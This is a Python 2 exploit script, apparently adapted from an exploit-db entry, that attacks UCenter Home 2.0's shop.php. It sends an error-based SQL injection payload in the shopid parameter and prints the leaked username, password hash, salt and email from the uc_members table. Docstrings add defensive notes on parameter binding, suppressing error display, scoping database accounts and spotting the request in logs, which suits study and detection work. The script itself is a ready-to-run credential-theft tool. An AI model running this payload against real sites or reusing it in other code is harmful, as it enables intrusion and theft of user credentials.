#!/usr/bin/env python

import sys
import urllib2
import re

def info():
    """Print the script's provenance lines and its usage message.

    Called by main() when the command line does not carry exactly one
    argument. It only writes to stdout; no request is made.
    """
    banner = (
        'From:http://www.exploit-db.com/exploits/14997/',
        'http://www.hake.cc/Web_loudong/',
        'changed:qiaoy',
        'exp:',
        ' ./UCenter_Home_2.0.py site',
    )
    for line in banner:
        print line
def main():
    """Request /shop.php with an injected ``shopid`` and print the leaked row.

    With anything other than exactly one command-line argument the usage
    text from info() is printed and nothing else happens. Otherwise the
    argument is taken as the site base URL ('http://' is prepended when it
    carries no http/https scheme) and a single GET is sent whose ``shopid``
    value embeds a nested SELECT over ucenter.uc_members. The query is
    built to fail with MySQL's "Duplicate entry ... for key" error, and the
    script reads uid:username:password:salt:email out of that error text in
    the response body.

    What this tells a defender:
      * The leak needs two things at once: ``shopid`` reaching the SQL
        statement unescaped (inferred from the payload; the server code is
        not shown here) and database error text being echoed to the
        client. Casting ``shopid`` to an integer or binding it as a query
        parameter removes the first; turning off error display removes
        the second.
      * The statement reads another schema (``ucenter``) as well as
        ``information_schema``, so a database account scoped to the
        application's own tables would narrow what such a request can
        reach.
      * In access logs the request stands out: ``shop.php`` with a
        ``shopid`` containing ``information_schema``, ``concat(`` or
        ``floor(rand(0)*2)``, answered by a body containing
        "Duplicate entry".
    """
    if len(sys.argv) != 2:
        info()
        return

    site = sys.argv[1]
    # The original stored already-prefixed URLs in a local that is never
    # read; only the missing-scheme case actually changes `site`.
    if site[0:7] != 'http://' and site[0:8] != 'https://':
        site = 'http://' + site

    try:
        # Error-based injection carried in the shopid parameter, reproduced
        # exactly as published on the page.
        query = '/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
        body = urllib2.urlopen(site + query).read()
        # The selected row is wrapped in ~'...'~ by the query, so it shows up
        # inside the duplicate-key error message.
        matches = re.findall(r'Duplicate entry \'~\'(.*?)\' for key', body)
        fields = matches[0].split(':')
        # fields[0] is the uid column and is not printed.
        for idx, label in enumerate(('Name: ', 'Passwd: ', 'salt: ', 'email: '), 1):
            print label + fields[idx]
    except:
        # Bare except, as in the original: a network failure, a response
        # without the error text (IndexError) and a short row all end here
        # with the same message.
        print 'Sorry,I can\'t work............'
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()